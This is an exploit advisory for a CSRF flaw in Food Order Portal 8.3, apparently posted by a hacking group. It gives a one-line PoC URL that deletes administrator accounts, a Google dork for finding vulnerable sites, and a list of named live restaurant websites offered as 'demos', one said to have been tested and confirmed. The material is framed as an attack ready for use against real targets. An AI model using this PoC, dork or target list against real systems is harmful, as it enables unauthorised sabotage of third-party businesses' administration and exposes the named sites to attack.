Food Order Portal 8.3 - (CSRF) Remote Admin Delete PoC

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact(onlymail) : knockout@e-mail.com.tr
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
############################################################
                 Turkey Security Group
                 'h4x0re SECURITY'                      
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Food Order Portal
|~Affected Version : 8.3
|~Official Web and referance's : http://www.tourismscripts.com/scripts/scripts/food-order-portal-multi-restaurant-lingual-php-script.html
|~RISK : Medium
|~Google Keyword/Dork : inurl:login_restaurant.php        | are example
|~Tested On : Kali Linux \ Tested Browser: Mozilla Firefox \ Arora
####################INFO################################
without logging in to the admin panel it is possible to delete administrator..
########################################################
########################################################
Demos ;
http://click4foods.co.uk       <=== Tested and panel was checked. CSRF was confirmed
                                                     ( From the official site of reference are shown )

http://www.saveonmeals.com
http://pizzatakeway.it/
http://myfood24.it/
http://www.foodrunner.ru/
..
..
=============================================================
                        CSRF PoC:
http://[VICTIM]/admin/admin_user_delete.php?admin_id=[ADMIN ID] (Default: 1,2)
                       Administrator Deleted.
=============================================================